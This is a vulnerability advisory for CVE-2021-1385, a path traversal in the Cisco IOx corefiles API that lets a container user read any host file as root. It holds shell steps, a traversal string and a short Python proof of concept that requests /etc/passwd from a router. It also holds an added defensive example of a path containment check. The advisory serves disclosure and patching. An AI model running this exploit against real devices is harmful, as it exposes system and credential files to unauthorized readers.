Overview
IOx makes it possible to host containers on Cisco routers. Once enabled, the router provides an API for installing, activating and starting containers.
core_dir is a directory that can be used by both the API and the container itself.
The API that retrieves these files is vulnerable to path traversal, which allows reading files on the host (as root).
In addition, a symlink created from the container in this directory is wrongly resolved by the API on the host (same issue as #3).
Impact
This results in arbitrary read with root privileges on the host filesystem.
Detail
The corefiles API uses getCoreFile for path resolution.
It gets the directory on the host and computes the path from the core_filename provided by the user.
A regular expression prevents the user from providing a core_filename that does not start with a word or a space.
But the attacker can create a directory in their core_dir directory:
[root@guestshell guesshell]# cd /local/local1/core_dir/
[root@guestshell core_dir]# mkdir test
Then the user can provide a path that passes the check, such as test/../../../../../<path>.
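The containment check missing from the resolution described above, as an added example that is not Cisco's code or part of the original advisory. The regular expression, the function names and the directory layout are assumptions built for the demonstration; the example covers both the `test/../..` case and the symlink case mentioned in the overview.

```python
import os
import re
import tempfile

# Assumed stand-in for the advisory's check: first character is a word character or a space.
PREFIX_RE = re.compile(r"^[\w ]")

def naive_core_path(core_dir, core_filename):
    """Prefix check, then join: the resolution pattern the advisory describes."""
    if not PREFIX_RE.match(core_filename):
        raise ValueError("invalid core file name")
    return os.path.join(core_dir, core_filename)

def safe_core_path(core_dir, core_filename):
    """Resolve '..' and symlinks first, then require the result to stay under core_dir."""
    if not PREFIX_RE.match(core_filename):
        raise ValueError("invalid core file name")
    base = os.path.realpath(core_dir)
    target = os.path.realpath(os.path.join(base, core_filename))
    if target == base or os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes core_dir")
    return target

def demo():
    """Run both resolvers over a constructed layout; returns {name: (naive_escapes, verdict)}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.realpath(tmp)
        core_dir = os.path.join(root, "core_dir")       # shared with the container
        host_file = os.path.join(root, "host_file")     # outside core_dir
        os.makedirs(os.path.join(core_dir, "test"))
        for path in (host_file, os.path.join(core_dir, "app.core")):
            open(path, "w").close()
        os.symlink(host_file, os.path.join(core_dir, "link.core"))
        results = {}
        for name in ("app.core", "test/../../host_file", "link.core"):
            naive_escapes = os.path.realpath(naive_core_path(core_dir, name)) == host_file
            try:
                safe_core_path(core_dir, name)
                verdict = "allowed"
            except ValueError:
                verdict = "rejected"
            results[name] = (naive_escapes, verdict)
        return results

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The check and the later open are separate steps, and the container can write to core_dir in between, so a production implementation should also open the file without following symlinks (for example `O_NOFOLLOW` on the final component) or validate the opened descriptor.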
Proof of Concept
Here is a Python script that downloads files from the host. It requires the directory /local/local1/core_dir/test to exist in the container.
import requests
import base64
# Please replace it with valid login and password
pwd=base64.b64encode(b'<REDACTED>:<REDACTED>')
h = {'Authorization': b'Basic ' + pwd}
r=requests.post('https://192.168.1.39/iox/api/v2/hosting/tokenservice', headers=h, verify=False)
token=r.json()['token']['id']
headers = {
    'X-Token-Id': token
}
r=requests.get('https://192.168.1.39/iox/api/v2/hosting/apps/guestshell/corefiles?corefile=test/../../../../../../../../../etc/passwd',headers=headers, verify=False)
res = r.text
print("File Content:\n%s"%res)
Solution
Security patch
Cisco fixed this vulnerability in the following releases:
- 17.3(2.5) and later
- 17.3.3 and later
- 17.5(0.144) and later
- 17.5.1 and later
- 17.6.(0.17) and later
- 17.6.1 and later
Workaround
There are no workarounds that address this vulnerability.
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-pt-hWGcPf7g
https://nvd.nist.gov/vuln/detail/CVE-2021-1385
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Timeline
Date reported: November 27, 2020
Date fixed: March 24, 2021